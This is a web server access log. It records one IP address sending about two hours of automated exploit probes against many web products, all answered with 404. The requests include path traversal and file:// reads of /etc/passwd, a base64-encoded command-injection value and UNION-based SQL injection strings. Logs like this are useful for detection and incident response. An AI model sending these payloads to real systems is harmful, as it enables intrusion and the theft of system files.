137.220.197.141 - - [21/Jan/2024:14:11:41 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:13:07 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:13:20 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:13:30 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:13:32 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:14:10 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:14:12 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:14:14 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:14:16 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:14:56 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:14:58 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:03 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:05 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:07 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:09 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:12 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:36 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:15:38 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:16:51 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:17:03 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:17:16 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:18:35 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:18:37 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:20:17 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:20:19 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:20:50 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:21:05 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:21:07 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:21:13 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:21:15 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:21:44 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:22:10 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:22:49 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:22:51 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:23:52 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:23:54 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:24:13 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:24:15 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:24:36 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:24:38 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:26:28 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:26:28 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:26:37 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:26:39 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:27:02 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:27:04 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:28:07 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:28:18 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:28:31 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:28:40 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:28:42 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:28:52 +0100] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:29:27 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:29:29 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:30:02 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:30:02 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:30:04 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:30:18 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:30:29 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:30:41 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:31:21 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:31:26 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:31:29 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:31:31 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:31:42 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:32:00 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:32:08 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:32:10 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:32:52 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:33:16 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:33:39 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:33:41 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:34:06 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:34:08 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:34:14 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:34:29 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:35:07 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:35:11 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:35:29 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:35:33 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:37:30 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:00 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:03 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:07 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:09 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:41 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:45 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:39:55 +0100] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:40:35 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:40:45 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:40:53 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:40:57 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:41:06 +0100] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:41:56 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:41:56 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:42:10 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:42:56 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:42:58 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:43:18 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:43:21 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:43:23 +0100] "POST /search/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:43:28 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:43:40 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:44:29 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:45:22 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:45:45 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:46:28 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:46:30 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:46:31 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:47:15 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:47:35 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:49:37 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:49:38 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:49:57 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:49:59 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:50:01 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:50:06 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:50:08 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:50:24 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:50:24 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:50:26 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:51:01 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:00 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:03 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:12 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:18 +0100] "GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:24 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:47 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:50 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:52 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:52:57 +0100] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:53:10 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:53:12 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:53:33 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:53:35 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:55:01 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:55:53 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:56:41 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:56:47 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:56:51 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:57:01 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:57:02 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:57:03 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:57:08 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:58:06 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:58:24 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:58:38 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:58:40 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:23 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:23 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:25 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:25 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:40 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:50 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:59:55 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:00:03 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:00:06 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:00:18 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:00:25 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:00:49 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:00:51 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:01:13 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:01:18 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:01:30 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:01:32 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:01:36 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:03:21 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:03:22 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
